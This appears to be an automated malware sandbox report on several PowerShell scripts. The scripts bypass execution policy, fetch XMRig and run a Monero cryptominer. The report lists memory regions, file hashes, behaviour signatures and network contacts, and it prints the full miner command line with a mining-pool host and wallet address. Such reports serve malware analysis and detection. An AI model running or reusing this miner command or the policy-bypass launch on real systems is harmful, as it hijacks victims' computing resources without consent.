memory/4296-11-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4296-12-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4296-14-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4296-15-0x000001C0B06E0000-0x000001C0B06F2000-memory.dmp

memory/4296-16-0x000001C0B06D0000-0x000001C0B06DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4552-47-0x0000020EFC3B0000-0x0000020EFC3D0000-memory.dmp

memory/4552-48-0x0000020EFDEC0000-0x0000020EFDEE0000-memory.dmp

memory/4552-49-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4296-50-0x00007FFE444A3000-0x00007FFE444A5000-memory.dmp

memory/4296-51-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4552-53-0x0000020F90AB0000-0x0000020F90AD0000-memory.dmp

memory/4552-52-0x0000020F90A90000-0x0000020F90AB0000-memory.dmp

memory/4552-54-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-55-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4296-56-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4552-59-0x0000020F90AB0000-0x0000020F90AD0000-memory.dmp

memory/4552-58-0x0000020F90A90000-0x0000020F90AB0000-memory.dmp

memory/4552-57-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-60-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-61-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-62-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-63-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-64-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-65-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-66-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-67-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-68-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-69-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-70-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-71-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-72-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-73-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-74-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-75-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-76-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-77-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-78-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-79-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-80-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-81-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-82-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-83-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-84-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-85-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-86-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-87-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-88-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-89-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-90-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-91-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-92-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-93-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-94-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-95-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-96-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-97-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-98-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-99-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-100-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-101-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-102-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-103-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-104-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-105-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-106-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-107-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-108-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-109-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-110-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-111-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-112-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-113-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-114-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-115-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-116-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-117-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-118-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp

Files

memory/2772-0-0x00007FFC401D3000-0x00007FFC401D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpzzehcz.xp4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2772-10-0x000001ADFE270000-0x000001ADFE292000-memory.dmp

memory/2772-11-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/2772-12-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/2772-14-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/2772-16-0x000001ADFE2C0000-0x000001ADFE2CA000-memory.dmp

memory/2772-15-0x000001ADFEA00000-0x000001ADFEA12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1572-47-0x000001D8F3430000-0x000001D8F3450000-memory.dmp

memory/1572-48-0x000001D9873F0000-0x000001D987410000-memory.dmp

memory/1572-49-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-50-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/2772-51-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/1572-53-0x000001D987A60000-0x000001D987A80000-memory.dmp

memory/1572-52-0x000001D987A40000-0x000001D987A60000-memory.dmp

memory/2772-54-0x00007FFC401D3000-0x00007FFC401D5000-memory.dmp

memory/1572-55-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/2772-56-0x00007FFC401D0000-0x00007FFC40C91000-memory.dmp

memory/1572-57-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-58-0x000001D987A40000-0x000001D987A60000-memory.dmp

memory/1572-59-0x000001D987A60000-0x000001D987A80000-memory.dmp

memory/1572-60-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-61-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-62-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-63-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-64-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-65-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-66-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-67-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-68-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-69-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-70-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-71-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-72-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-73-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-74-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-75-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-76-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-77-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-78-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-79-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-80-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-81-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-82-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-83-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-84-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-85-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-86-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-87-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-88-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-89-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-90-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-91-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-92-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-93-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-94-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-95-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-96-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-97-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-98-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-99-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-100-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-101-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-102-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-103-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-104-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-105-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-106-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-107-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-108-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-109-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-110-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-111-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-112-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-113-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-114-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-115-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-116-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-117-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

memory/1572-118-0x00007FF757970000-0x00007FF7585A3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/4092-3-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-5-0x000001C7CA4A0000-0x000001C7CA4C2000-memory.dmp

memory/4092-9-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-8-0x000001C7E29F0000-0x000001C7E2A66000-memory.dmp

memory/4092-10-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pjmroa15.4re.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4092-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-48-0x000001C7E29B0000-0x000001C7E29C2000-memory.dmp

memory/4092-61-0x000001C7CA480000-0x000001C7CA48A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4988-90-0x000001EA8FF90000-0x000001EA8FFB0000-memory.dmp

memory/4988-91-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4092-93-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4988-92-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4092-94-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4988-95-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-96-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-97-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-98-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-99-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-100-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-101-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-102-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-103-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-104-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-105-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-106-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-107-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-108-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-109-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-110-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-111-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-112-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-113-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-114-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-115-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-116-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-117-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-118-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-119-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-120-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-121-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-122-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-123-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-124-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-125-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-126-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-127-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-128-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-129-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-130-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-131-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-132-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-133-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-134-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-135-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-136-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-137-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-138-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-139-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-140-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-141-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-142-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-143-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-144-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-145-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-146-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-147-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-148-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-149-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-150-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-151-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-152-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-153-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-154-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

memory/4988-155-0x00007FF788A70000-0x00007FF7896A3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:53

Platform

win7-20240215-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
